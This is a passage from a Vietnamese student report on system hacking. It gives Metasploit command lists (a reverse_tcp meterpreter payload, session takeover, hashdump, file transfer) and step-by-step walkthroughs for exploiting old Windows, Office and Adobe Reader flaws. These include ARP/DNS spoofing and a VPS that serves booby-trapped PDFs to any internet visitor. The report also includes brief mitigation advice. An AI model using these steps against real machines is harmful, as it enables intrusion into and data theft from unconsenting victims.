trong đó có chứa những lỗi lập trình, được biết đến với tên gọi lỗ hổng.

Những lỗ hổng này được Hacker sử dụng để xâm nhập vào hệ thống, cũng

như được tác giả của các đọan mã độc dùng để khởi động chương trình

của họ một cách tự động trên máy tính của bạn.

Hiện nay các lỗ hổng bảo mật được phát hiện càng nhiều trong các hệ điều

hành, các Web Server hay các phần mềm khác, ... Và các hãng sản xuất

luôn cập nhật các lỗ hổng và đưa ra các phiên bản mới sau khi đã vá lại

các lỗ hổng của các phiên bản trước. Do đó, người sử dụng phải luôn cập

nhật thông tin và nâng cấp phiên bản cũ mà mình đang sử dụng nếu không

các Hacker sẽ lợi dụng điều này để tấn công vào hệ thống. Thông thường,

các forum của các hãng nổi tiếng luôn cập nhật các lỗ hổng bảo mật và

việc khai thác các lỗ hổng đó như thế nào thì tùy từng người.

Microsoft luôn có những cải tiến an ninh vượt trội qua mỗi phiên bản mới

của hệ điều hành Windows. Tuy nhiên, một sự thật là các mối đe dọa

mạng vẫn đang ngày càng phát triển nhanh hơn so với chu trình cập nhật

và đổi mới hệ điều hành của Microsoft.

Tội phạm mạng thường sử dụng các lỗ hổng trong các mã chương trình để

truy cập vào các dữ liệu và tài nguyên trên máy tính bị lỗi bảo mật. Các

chương trình độc hại được thiết kế đặc biệt để khai thác các lỗ hổng này,

được gọi là kỹ thuật exploit, đang ngày càng phổ biến nhanh chóng.

Những sản phẩm của Microsoft thường gặp phải các lỗ hổng bảo mật như

HĐH Windows, Internet Explorer, Windows Server, Microsoft Exchange

và .NetFramework.

Một số lỗ thổng đặc biệt thường bị khai thác: MS10_090, MS10_042,

MS12_027, MS10_046, MS10-046, MS12-004, MS08-067,……

Trần Đăng Khoa Tấn công lỗ hổng hệ thống - System Hacking

16

1.6. Công cụ sử dụng tấn công:

1.6.1. Hệ điều hành Backtrack 5 r3:

Hình 5: Giao diện sử dụng của backtrack 5 r3

Backtrack là một bảng phân phối dạng Live DVD của Linux, được

phát triển để thử nghiệm xâm nhập. Cung cấp cho người dùng dễ dàng

truy cập vào một bộ sưu tập toàn diện và lớn các công cụ bảo mật liên

quan đến nhau, từ máy quét cổng để kiểm toán an ninh. Hỗ trợ cho Live

CD và Live USB chức năng cho phép người sử dụng để khởi động

Backtrack trực tiếp từ phương tiện truyền thông di động mà không cần cài

đặt, dù lắp đặt cố định vào đĩa cứng và mạng cũng là một lựa chọn.

BackTrack sắp xếp các công cụ thành 12 loại:

Thu thập thông tin

Đánh giá tổn thương

Công cụ khai thác

Leo thang đặc quyền

Duy trì truy cập

Kỹ thuật đảo ngược

Công cụ RFID

Căng thẳng thử nghiệm

Forensics

Công cụ báo cáo

Dịch vụ

Hỗn hợp

Trần Đăng Khoa Tấn công lỗ hổng hệ thống - System Hacking

17

Câu lệnh thường sử dụng để tấn công trong Backtrack:

#Username:root/password:toor : Thông tin đăng nhập

#Startx : vào giao diện đồ họa

#Dhclient –r : xóa thông số IP của máy

#Dhclient eth0 : xin lại IP cho card eth0

#Msfconsole : khởi động metasploit

>Search xxx : tìm kiếm lỗ hổng xxx

>Use x/y/z : sử dụng module , x/y/z là đường dẫn matching

module

>Show options : kiểm tra các thuộc tính của mã lỗi.

>Set srvhost A : A là IP máy backtrack

>Set lhost A

>Set lport B : B là port muốn mở, B phải khác các port của

hệ thống

>Set payload windows/meterpreter/reverse_tcp

>Exploit : tiêm mã độc.

>Set filename abc : chỉnh tên file thành abc

>sessions –i x : chiếm quyền điều khiển máy nạn nhân , x

là id sessions máy nạn nhân.

Câu lệnh sử dụng để điều khiển và khai thác tài nguyên:

>getuid : xem thông tin hệ thống

>sysinfo : xem thông tin hệ thống

>upload /root/Desktop/abc.doc C:/ : tải file abc.doc từ

máy backtrack qua ổ C máy nạn nhân

>download C:/xyz.doc /root/Desktop : tải file xyz.doc từ

máy nạn nhân về máy backtrack

>haskdump : lấy hashpass

>shell : khám phá ổ đĩa máy nạn nhân

>cd C:\ : chuyển dấu nhắc ổ đĩa

>dir : liệt kê tài nguyên trong ổ C

>md abc : tạo thư mục abc trong ổ C

>rd abc : xóa thư mục abc trong ổ C

>del abc.txt : xóa file abc.txt trong ổ C

>exit : thoát.

Trần Đăng Khoa Tấn công lỗ hổng hệ thống - System Hacking

18

1.6.2. Ettercap:

Ettercap là một công cụ trung gian giữa các cuộc tấn công trong

mạng LAN. Nó có tính năng đánh hơi các các kết nối trực tiếp, lọc

nội dung chuyển trên mạng và nhiều thủ thuật thú vị khác. Nó hỗ trợ

mổ sẻ hoạt động và thụ động của nhiều giao thức (ngay cả với

Ciphered) và bao gồm nhiều tính năng cho mạng lưới phân tích và

máy chủ.

Với Ettercap bạn có thể theo dõi những lưu lượng thông tin hoạt

động trên hệ thống mạng của bạn, chụp các thông tin, hiển thị và can

thiệp vào các kết nối, theo dõi các host đang trao đổi trên mạng.

Hỗ trợ kỹ thuật tấn công Address Resolution Protocol (ARP)

spoofing hay còn gọi là ARP flooding, ARP poisoning hay ARP

Poison Routing (APR). Đó là cách tấn công từ một máy tính trong

mạng LAN, thông qua giao thức ARP và địa chỉ MAC, IP, nó nhằm

ngắt kết nối từ một hay một số máy tính với Modem, dẫn đến tình

trạng các máy tính đó không thể truy cập Internet.

Ngoài ra còn dùng trong 1 kiểu tấn công MITM khác là giả mạo

DNS (DNS Spoofing) mà chúng ta sử dụng trong đề tài này.

1.6.3. Nmap (Network Mapper) và Nessus:

Nmap là một tiện ích miễn phí kiểm toán an ninh. Zenmap (Công cụ

hỗ trợ đồ họa của nmap) được cài đặt sẵn trong BackTrack, sử dụng

các gói tin IP giúp xác định host nào có sẵn trên mạng, các dịch vụ

(tên ứng dụng và phiên bản) mà host đó đang cung cấp, hệ điều hành

gì (và các phiên bản hệ điều hành) mà họ đang chạy, loại bộ lọc gói

tin hoặc tường lửa nào đang sử dụng, và nhiều đặc điểm khác. Nmap

chạy được trên tất cả các hệ điều hành. Sau khi xác định được các

host có trong mạng, ta có thể sử dụng các công cụ quét lỗi hệ thống

để xác định lỗ hổng của hệ thống muốn xâm nhập, từ đó khai thác

truy cập vào hệ thống.

Nessus là công cụ dùng để quét các lỗi hệ thống của các host trong

một hệ thống mạng LAN. Ta có thể download tại địa chỉ

www.nessus.org.

Trần Đăng Khoa Tấn công lỗ hổng hệ thống - System Hacking

19

1.6.4. Metasploit:

Metasploit là một dự án bảo mật máy tính cung cấp các thông tin về

vấn đề lỗ hổng bảo mật cũng như giúp đỡ về kiểm tra thâm nhập và

phát triển hệ thống phát hiện tấn công mạng. Metasploit Framework

là một môi trường dùng để kiểm tra, tấn công và khai thác lỗi của các

service. Metasploit được xây dựng từ ngôn ngữ hướng đối tượng

Perl, với những components được viết bằng C, assembler, và Python.

Metasploit có thể chạy trên hầu hết các hệ điều hành: Linux,

Windows, MacOS. Chúng ta có thể download chương trình tại

www.metasploit.com.

Metasploit hỗ trợ nhiều giao diện với người dùng:

o Console interface: dùng lệnh msfconsole. Msfconsole interface sử

dụng các dòng lệnh để cấu hình, kiểm tra nên nhanh hơn và mềm

dẻo hơn.

o Web interface: dùng msfweb, giao tiếp với người dùng thông qua

giao diện Web.

o Command line interface: dùng msfcli.

1.6.5. Máy chủ ảo (Virtual Private Server - VPS):

VPS là phương pháp phân chia một máy chủ vật lý thành nhiều

máy chủ ảo. Trong khi trên 1 server chạy Share Host thì có thể có hàng

trăm tài khoản cùng chạy 1 lúc, nhưng trên server chạy VPS thì con số

chỉ bằng 1/10. Do vây, VPS có hiệu năng cao hơn Share Host rất nhiều

lần.Hoạt động hoàn toàn như một server riêng nên sở hữu một phần

CPU riêng, dung lượng Ram riêng, dung lượng ổ HDD riêng, địa chỉ Ip

riêng và hệ điều hành riêng.

Ngoài việc dùng VPS để thiết lập Web Server, Mail Server cũng

như các ứng dụng khác thì có thể cài đặt để thực hiện những nhu cầu

riêng như truy cập Web bằng trình duyệt Web trên VPS,

download/upload bittorent với tốc độ cao...

Trần Đăng Khoa Tấn công lỗ hổng hệ thống - System Hacking

20

2. Khai thác xâm nhập hệ thống trong mạng LAN:

2.1. Sơ đồ tổng quan hệ thống mạng LAN:

Hình 6: Sơ đồ hệ thống mạng LAN

Trong một mạng LAN nội bộ, các máy tính thường kết nối với nhau với

khoảng cách vật lý gần như trong một phòng, một tầng, một tòa nhà, công ty.

Các máy tính trong mạng LAN có thể chia sẻ tài nguyên với nhau, mà điển hình

là chia sẻ tập tin, máy in, máy quét và một số thiết bị khác. Khi một máy tính ở

trong mạng LAN, nó có thể sử dụng các chương trình, phần mềm quét hệ thống

mạng để biết được địa chỉ IP các host có trong mạng.

2.2. Tiến hành tấn công và khai thác lỗ hổng:

Trước khi quá trình tấn công diễn ra thì Attacker sẽ sử dụng các công cụ

Nmap hoặc Nessus để quét toàn bộ hệ thống mạng. Kiểm tra các lỗi hệ thống

của các hệ điều hành và dựa vào những lỗi đó để tấn công.( chi tiết cách sử

dụng Nmap và Nessus xem PHỤ LỤC 5: Sử dụng Nmap và Nessus)

2.2.1. Xâm nhập và khai thác lỗ hổng MS10_090:

a. Giới thiệu lỗ hổng MS10_090:

Các phiên bản Microsoft Internet Explorer 6, 7, and 8 cho phép

kẻ tấn công thực hiện mã lệnh thông qua Cascading Style Sheets

(CSS).

Lỗi này nằm trong cơ chế thực hiện mã hóa phiên làm việc của

ứng dụng web ASP.NET, dẫn tới việc kẻ tấn công có thể thăm dò để

tìm ra khóa giải mã trong một thời gian ngắn.

Trần Đăng Khoa Tấn công lỗ hổng hệ thống - System Hacking

21

b. Cách thức tấn công và điều khiển máy nạn nhân:

Hình 7: Sơ đồ tấn công ms10_090

Trên máy Attacker sẽ tiến hành quét hệ thống mạng tìm

lỗi(xem PHỤ LỤC) và tiến hành tiêm nhiễm dựa vào các thông tin

mã lỗi đó. Sau đó Attacker sẽ dẫn dụ nạn nhân truy cập vào địa chỉ

máy tấn công. Khi đó máy Victim sẽ bị chiếm quyền điều khiển. (

chi tiết quá trình tấn công xem PHỤ LỤC 2: Các bước tấn công và

khai thác lỗ hổng MS10_090)

c. Quá trình tấn công mã lỗi MS10_090:

Bước 1: khởi động metasploit

Hình 8: giao diện khởi động của metasploit

Trần Đăng Khoa Tấn công lỗ hổng hệ thống - System Hacking

22

Bước 2: tìm kiếm module ms10_090

Hình 9: đường dẫn module ms10_090

Bước 3: sử dụng module này

Hình 10: sử dụng module ms10_090

Bước 4: thiết lập các thuộc tính cần thiết

Hình 11: Xem các thuộc tính của module ms10_090

Trần Đăng Khoa Tấn công lỗ hổng hệ thống - System Hacking

23

Hình 12: thiết lập các thuộc tính cho module ms10_090

Bước 5: tiêm nhiễm

Hình 13: đường link dẫn tới máy Attacker

Bước 6: lấy quyền điều khiển và xem các thông tin nạn nhân

Ta tiến hành copy URL gửi qua cho máy nạn nhân. khi nạn nhân

truy cập vào địa chỉ này thì máy backtrack sẽ chiếm được quyền điều

khiển của máy nạn nhân.

Hình 14: máy Victim truy cập vào đường link

Hình 15: mở phiên kết nối tới máy Victim

Trần Đăng Khoa Tấn công lỗ hổng hệ thống - System Hacking

24

Ta nhận thấy giữa máy nạn nhân và máy attacker đã thiết lập

một phiên làm việc có ID là 1. Ta tiến hành thực thi quyền điều khiển

trong session này.

Hình 16: truy cập vào phiên vừa mở

Xem thông tin máy xp và thực hiện tất cả các quyền được cho

phép trên win XP.

Hình 17: thông tin máy Victim

2.2.2. Xâm nhập và khai thác lỗ hổng MS10_042 có che dấu đánh lừa

máy nạn nhân:

a. Giới thiệu lỗ hổng MS10_042:

Lỗ hổng bảo mật trong “Help and Support Center” có thể cho

phép thực hiện mã lệnh từ xa.

Mã lỗi được thực thi khi người dùng xem một trang web thiết

kế đặc biệt bằng cách sử dụng một trình duyệt web hoặc nhấp vào

một liên kết thiết kế đặc biệt trong thông báo email.

Các hệ điều hành bị ảnh hưởng:

Windows XP service SP2,SP3

Windows XP pro x64 edition SP2

Windows server 2003 SP2

Windows server 2003 x64 Edition SP2

Windows server 2003 with SP2 for Itanium – based Systems

Trần Đăng Khoa Tấn công lỗ hổng hệ thống - System Hacking

25

b. Cách thức tấn công và điều khiển máy nạn nhân:

Hình 18: Sơ đồ tấn công mã lỗi ms10_042

Trên máy Attacker sẽ tiến hành quét hệ thống mạng tìm

lỗi(xem PHỤ LỤC) và tiến hành tiêm nhiễm dựa vào các thông tin

mã lỗi đó. Sau đó Attacker sẽ dẫn dụ nạn nhân truy cập vào địa chỉ

máy tấn công. Khi đó máy Victim sẽ bị chiếm quyền điều khiển. (

chi tiết quá trình tấn công xem PHỤ LỤC 3: Các bước tấn công và

khai thác lỗ hổng MS10_042)

c. Quá trình tấn công mã lỗi MS10_042:

Bước 1: Giả mạo, chỉnh sửa DNS đánh lừa máy nạn nhân

Hình 19: Vào thư mục Ettercap

Hình 20: trỏ DNS đến IP Attacker

Trần Đăng Khoa Tấn công lỗ hổng hệ thống - System Hacking

26

Bước 2: cách tấn công tương tự cách tấn công mã MS10_090

Hình 21: Link URL máy Attacker

Bước 3: Đổi địa chỉ IP máy tấn công thành địa chỉ router

Hình 22: Màn hình khởi động Ettercap

Trần Đăng Khoa Tấn công lỗ hổng hệ thống - System Hacking

27

Hình 23: Tìm kiếm các host trong mạng

Hình 24: Danh sách host trong mạng

Hình 25: giả mạo địa chỉ Attacker thành địa chỉ router

Trần Đăng Khoa Tấn công lỗ hổng hệ thống - System Hacking

28

Bước 4: Địa chỉ MAC attacker biến thành địa chỉ MAC của

router, vì vậy máy nạn nhân sẽ nhầm tưởng máy Attacker là

router, mọi hoạt động của máy nạn nhân đề bị attacker biết được.

Hình 26: địa chỉ MAC của máy Attacker

Hình 27: địa chỉ router sau khi thay đổi

Bước 5: Mở session kết nối và điều khiển máy nạn nhân

Hình 28: mở một phiên điều khiển máy Victim

Hình 29: thông tin máy Victim

Trần Đăng Khoa Tấn công lỗ hổng hệ thống - System Hacking

29

2.2.3. Xâm nhập và khai thác lỗ hổng MS12_027:

a. Giới thiệu lỗ hổng MS12_027:

Trong các phiên bản Office phổ biến (từ 2003, 2007, 2010)

đều dính lỗ hổng này. Nguyên nhân tạo ra lỗ hổng là do lập trình

viên của Microsoft cẩu thả khi lập trình. Hậu quả là hàng triệu máy

tính bị tấn công thông qua lỗ hổng tưởng chừng rất đơn giản này.

Các tập tin độc hại có thể được gửi như một file đính kèm

email, nhưng những kẻ tấn công sẽ phải thuyết phục người sử dụng

mở file đính kèm để khai thác lỗ hổng.

b. Cách thức tấn công và điều khiển máy nạn nhân:

Hình 30: Sơ đồ tấn công mã lỗi ms12_027

Trên máy Attacker sẽ tiến hành quét hệ thống mạng tìm

lỗi(xem PHỤ LỤC) và tiến hành tiêm nhiễm dựa vào các thông tin

mã lỗi đó. Sau đó Attacker sẽ dẫn dụ nạn nhân truy cập vào địa chỉ

máy tấn công. Khi đó máy Victim sẽ bị chiếm quyền điều khiển.

c. Quá trình tấn công mã lỗi MS12_027:

Bước 1: tạo file nhiễm độc từ máy của attacker

Hình 31: đường dẫn đến file bị nhiễm độc

Trần Đăng Khoa Tấn công lỗ hổng hệ thống - System Hacking

30

Bước 2: Thiết lập multi handler điều khiển máy bị nhiễm file độc

Hình 32: Thiết lập handler lắng nghe kết nối từ Victim

Bước 3: Bằng nhiều cách khác nhau ta dẫn dụ máy nạn nhân tải

file đã được tiêm nhiễm và mở file đó lên. Khi đó máy attacker sẽ

chiếm được quyền điều khiển của máy nạn nhân.

Hình 33: Victim truy cập file nhiễm độc

Hình 34: Mở phiên điều khiển máy Victim

Hình 35: thông tin máy Victim

Trần Đăng Khoa Tấn công lỗ hổng hệ thống - System Hacking

31

2.3. Giải pháp hạn chế tấn công trong mạng LAN:

Việc ngăn chặn tấn công vào các lỗ hổng này là tương đối khó khăn, tuy

nhiên có các biện pháp phòng chống tấn công từ các lỗ hổng này như sau:

Thường xuyên cập nhật các bản vá lỗi hệ đều hành do nhà cung cấp

đưa ra, thường xuyên để chế độ update tự động của hệ điều hành.

Cài đặt các phần mềm diệt virut, backdoor uy tín trên thị trường để

ngăn chặn tấn công.

Hạn chế truy cập các trang web không đáng tin cậy, tải tài liệu từ các

trang nguy hiểm hoặc click vào các đường dẫn nguy hiểm. Nhằm

tránh bị chiếm quyền truy cập từ máy.

Cấu hình tường lửa và các hệ thống ngăn chặn xâm nhập từ bên ngoài,

phát hiện các dấu hiệu scan hệ thống, thăm dò thông tin hệ thống,

cảnh báo tấn công kịp thời.

Mật khẩu phải được đặt nhiều hơn 8 ký tự và phải là tổng hợp giữa

chữ hoa, chữ thường, số và ký tự đặc biệt để các chương trình khó dò

ra.

Cấu hình trong registry cho mật khẩu trong hệ thống windows chỉ

được băm và lưu dưới dạng NTLM để các chương trình khó khăn để

dò tìm. Bật lên 1 ở khóa:

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\

NoLMHash

Người dùng admin nên xóa tập tin sam trong thư mục Windows/repair

sau mỗi lần backup dữ liệu bằng rdisk.

3. Xây dựng hệ thống Honeypot khai thác xâm nhập hệ thống từ xa qua

internet:

3.1. Giới thiệu về Honeypot:

Honeypot là một hệ thống tài nguyên thông tin được xây dựng với mục

đích giả dạng đánh lừa những kẻ sử dụng và xâm nhập không hợp pháp, thu

hút sự chú ý của chúng, ngăn không cho chúng tiếp xúc với hệ thống thật. Hệ

thống tài nguyên thông tin có nghĩa là Honeypot có thể giả dạng bất cứ loại

Trần Đăng Khoa Tấn công lỗ hổng hệ thống - System Hacking

32

máy chủ tài nguyên nào như là Mail Server, Domain Name Server, Web

Server…

Honeypot sẽ trực tiếp tương tác với tin tặc và tìm cách khai thác thông tin

về tin tặc như hình thức tấn công, công cụ tấn công hay cách thức tiến hành

thay vì bị tấn công. Với mục tiêu xây dựng Honeypot để xâm nhập vào lỗ

hổng hệ thống máy tính qua Internet, Hacker có thể sử dụng Máy chủ ảo

(VPS) và cài đặt Honeypot để giả dạng là một Web server bình thường, từ đó

đánh lừa máy nạn nhân khi một máy tính bất kỳ có kết nối Internet truy cập

vào địa chỉ mà VPS cung cấp.

3.2. Sơ đồ tổng quan sử dụng honeypot:

Hình 36: Sơ đồ tổng quan tấn công trên Internet

VPS có địa chỉ IP public, cài đặt sẵn công cụ Metasploit (download tại

http://metasploit.org). VPS đóng vai trò là một Honeypot trên mạng.

Cách đăng kí VPS free (xem PHỤ LỤC )

Các PC 1, PC 2. PC 3 là các người sử dụng mạng. Khi họ truy cập vào

địa chỉ IP public của VPS thì ta có thể tấn công vào lỗ hổng của máy

người đó đang sử dụng.

3.3. Xâm nhập và khai thác lỗi hổng Adobe reader 9.2 qua internet:

3.3.1. Giới thiệu lỗ hổng adobe reader 9.2:

Lỗ hổng bảo mật xuất phát từ lỗi tính năng Javascript có thể bị

khai thác để thực thi mã tùy ý hoặc làm hệ thống của nạn nhân rơi

vào trạng thái tương tự bị tấn công từ chối dịch vụ (DDoS).

Trần Đăng Khoa Tấn công lỗ hổng hệ thống - System Hacking

33

3.3.2. Cách thức tấn công và khai thác lỗ hổng:

Hình 37: Sơ đồ tấn công lỗ hổng adobe trên internet

Máy attacker là honeypot sử dụng công cụ metasploit tiêm

nhiễm file độc .pdf đưa lên môi trường internet, khi máy nạn nhân tải

file độc về và mở file độc bằng chương trình adobe reader 9.2 thì

máy nạn nhân sẽ bị nhiễm độc, honeypot sẽ gửi Trojan qua máy nạn

nhân và chiếm quyền điều khiển máy nạn nhân.

3.3.3. Quá trình tấn công lỗ hổng adobe reader 9.2:

Bước 1: Khởi động metasploit và tiến hành quá trình tiêm nhiễm

Hình 38: Giao diện khởi động metasploit frameword

Trần Đăng Khoa Tấn công lỗ hổng hệ thống - System Hacking

34

Hình 39: Tìm kiếm modul lỗi adobe reader 9.2

Hình 40: Sử dụng modul adobe tìm được

Hình 41: kiểm tra các thuộc tính của modul lỗi

Hình 42: Set các giá trị cho modul lỗi

Trần Đăng Khoa Tấn công lỗ hổng hệ thống - System Hacking

35

Hình 43: Đường dẫn file pdf bị tiêm nhiễm

Hình 44: thiết lập giá trị handler lắng nghe kết nối

Hình 45: mở phiên kết nối tới máy nạn nhân

Sau đó tiến hành gửi file bị nhiễm độc lên mạng dẫn dụ nạn nhân

tải về và mở file đó lên, khi đó máy nạn nhân sẽ kết nối với máy của

attacker và attacker có thể chiếm quyền điều khiển máy nạn nhân.

3.4. Giải pháp hạn chế tấn công qua internet:

Hạn chế truy cập vào các đường dẫn lạ trên internet, không tải tài liệu ở

những trang không an toàn, không tin tưởng và cảm thấy nghi ngờ.

Thường xuyên cập nhật, update hệ thống windows đang sử dụng, cập

nhật các bản vá lỗi nếu phát hiện.

Cài đặt các phần mềm chống virus, Trojan,…. Uy tín trên thị trường.

Kiểm soát hệ thống tường lửa, ngăn chặn các cuộc tấn công.

Kết luận chương 3:

Chương 3 đã trình bày được tình hình an ninh mạng hiện nay, các lỗ hổng thường

gặp, qui trình tấn công vào một lỗ hổng từ hệ thống. Ngoài ra còn nêu được thông tin

về một số ứng dụng thường được sử dụng trong quá trình tấn công. Mục tiêu mà các

cuộc tấn công hướng đến. Từ đó có thể đưa ra giải pháp hạn chế việc tấn công cho

người sử dụng hệ thống, hơn nữa còn là cơ sở để các nhà quản trị đưa ra các chính

sách bảo mật cho công ty, doanh nghiệp của mình để hạn chế tấn công, chống thất

thoát tài nguyên.

Trần Đăng Khoa Tấn công lỗ hổng hệ thống - System Hacking

36

KẾT LUẬN

Với công nghệ thông tin đang trên đà phát triển, các công cụ dùng để tấn công

cũng ngày càng nhiều, dẫn đến nguy cơ bị tấn công hệ thống càng nghiêm trọng hơn.

Kết với với các lỗ hổng do nhà sản xuất hệ thống dẫn đến việc tấn công trở nên thường

xuyên, các bản vá hệ điều hành do chính nhà sản xuất đưa ra vẫn chậm, khi đã tấn

công mới phát hiện được. Vì vậy việc phòng chống từ tính người sử dụng hệ điều hành

là vô cùng quan trọng trong việc ngăn chặn việc tấn công hệ thống.

Bài báo cáo đã trình bày được nội dung cũng như quá trình thực tập của sinh viên

trong môi trường doanh nghiệp thực tế. Từ đó đưa ra những kĩ năng, kiến thức và kinh

nghiệm sinh viên đã học hỏi được từ doanh nghiệp, giúp ích cho quá trình làm việc,

công tác sau này của sinh viên khi ra trường.

Bài báo cáo trên cũng đã đưa ra được các cách tấn công đặc trưng và điển hình

của attacker. Biết được qui trình tấn công và cách thức tấn công, người sử dụng sẽ dễ

dàng ngăn ngừa được, các nhà quản trị cũng có thể đưa ra các chính sách bảo mật cho

hệ thống của mình.

Việc tấn công sẽ diễn ra liên tục và không ngừng nghỉ, đòi hỏi kiến thức hiểu biết

của người dùng phải nâng cao từng ngày. Vì vậy phạm vi nghiên cứu của bài báo cáo

này vẫn chưa dừng lại.

Trần Đăng Khoa Tấn công lỗ hổng hệ thống - System Hacking

37

PHỤ LỤC

PHỤ LỤC 1: Đăng kí VPS free

Bước 1: truy cập vào đường dẫn địa chỉ sau: http://ukrdc.net/en/index.html

Click chọn vào Try VPS free.

Bước 2: Điền đầy đủ các thông tin và tiến hành order

Trần Đăng Khoa Tấn công lỗ hổng hệ thống - System Hacking

38

Bước 3: Vào email kiểm tra tài khoản đăng nhập được gửi cho và tiến hành

đăng nhập.

Bước 4: Khởi động VPS

Khi thấy ip hiện ra là đã khởi động thành công

Trần Đăng Khoa Tấn công lỗ hổng hệ thống - System Hacking

39

Vào email lấy tài khoản đăng nhập vào VPS

Remote desktop vào VPS để sử dụng

Trần Đăng Khoa Tấn công lỗ hổng hệ thống - System Hacking

40

PHỤ LỤC 2: Cài đặt Metasploit Framework trên VPS

Bước 1: Khởi động metasploit

Bước 2: Thực hiện quá trình cài đặt

Trần Đăng Khoa Tấn công lỗ hổng hệ thống - System Hacking

41

Trần Đăng Khoa Tấn công lỗ hổng hệ thống - System Hacking

42

Trần Đăng Khoa Tấn công lỗ hổng hệ thống - System Hacking

43

Trần Đăng Khoa Tấn công lỗ hổng hệ thống - System Hacking

44

PHỤ LỤC 3: Sử dụng Nmap và Nessus

Sử dung Nmap:

Trần Đăng Khoa Tấn công lỗ hổng hệ thống - System Hacking

45

Sử dụng Nessus:

DANH MỤC TÀI LIỆU THAM KHẢO

- Video demo cài đặt metasploit trên vps:

https://www.youtube.com/watch?v=TJRwbhcErKI

- Video demo tấn công trong mạng LAN:

https://www.youtube.com/watch?v=2wg70WvlJcQ

- Video demo tấn công trên mạng Internet:

https://www.youtube.com/watch?v=nw1QEzGNnb0

- Bộ sách + CD hướng dẫn Hacker mũ trắng Athena

- Bộ sách + CD hướng dẫn Systam Hacking Athena